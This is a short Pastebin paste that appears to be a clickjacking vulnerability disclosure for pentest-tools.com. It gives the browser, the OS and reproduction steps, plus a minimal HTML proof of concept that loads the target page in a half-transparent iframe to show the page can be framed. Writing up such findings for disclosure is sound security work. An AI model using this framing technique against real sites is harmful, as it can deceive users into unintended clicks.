Advertisement
psychoticoverlord

POC

Aug 14th, 2015
225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.47 KB | None | 0 0
  1.  
  2. Vulnerability: Clickjacking
  3. Vulnerable Domain: pentest-tools.com
  4. Vulnerable URL: https://pentest-tools.com/home
  5. Browser version: Google Chrome 44.0.2403.155
  6. Operating system: MacOS
  7. Steps to reproduce:
  8. Save code as HTML
  9. <html>
  10. CLICKJACKING
  11. <style>
  12. iframe {
  13. width: 800px;
  14. height: 500px;
  15. position: absolute;
  16. top: 0; left: 0;
  17. filter: alpha(opacity=50);
  18. opacity: 0.5;
  19. }
  20. </style>
  21. <iframe src="https://pentest-tools.com/home">
  22. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement